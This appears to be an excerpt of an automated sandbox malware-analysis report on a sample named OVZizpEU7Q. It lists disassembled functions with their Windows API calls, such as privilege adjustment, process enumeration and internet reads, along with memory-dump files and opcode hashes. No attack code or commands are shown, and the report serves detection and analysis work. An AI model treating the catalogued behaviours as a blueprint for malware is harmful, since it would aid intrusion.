                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                        • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                                        • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                        • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                                        Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                        • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2683427295-24824748
                                                                                        • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                        • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                                        • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                        • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                                        Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                        • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                                                        • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                        • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                                                        Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2576544623-0
                                                                                        • Opcode ID: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                                        • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                                                        • Opcode Fuzzy Hash: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                                        • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                                                        Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($|
                                                                                        • API String ID: 1659193697-1631851259
                                                                                        • Opcode ID: f379fe3d7a712482d9e6716fbfa6b33f72221a7867f36e4c9f34936809415def
                                                                                        • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                                                        • Opcode Fuzzy Hash: f379fe3d7a712482d9e6716fbfa6b33f72221a7867f36e4c9f34936809415def
                                                                                        • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                                                        Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: d3217ada22f57d27c47324fc3303e191d98c338249b7559d53ae04592ffd8b14
                                                                                        • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                                                        • Opcode Fuzzy Hash: d3217ada22f57d27c47324fc3303e191d98c338249b7559d53ae04592ffd8b14
                                                                                        • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                                                        Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                        • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                                                        • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                        • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                                                        Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                        • GetLastError.KERNEL32 ref: 00458865
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 81175457bd2116081fd482ae7269f4099234a407432aa681ee186d1b37444670
                                                                                        • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                                                        • Opcode Fuzzy Hash: 81175457bd2116081fd482ae7269f4099234a407432aa681ee186d1b37444670
                                                                                        • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                                                        Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                                        • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                        • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                                        • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                        • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                                                        Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 0046889B
                                                                                          • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                          • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID: 0eL
                                                                                        • API String ID: 2893107130-3167399643
                                                                                        • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                        • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                                                        • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                        • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                                                        Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                        • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                                                        • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                        • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                                                        Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                        • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                                                        • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                        • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                                                        Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                        • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                        • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                                                        • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                        • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                                                        Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                        • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                                                        • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
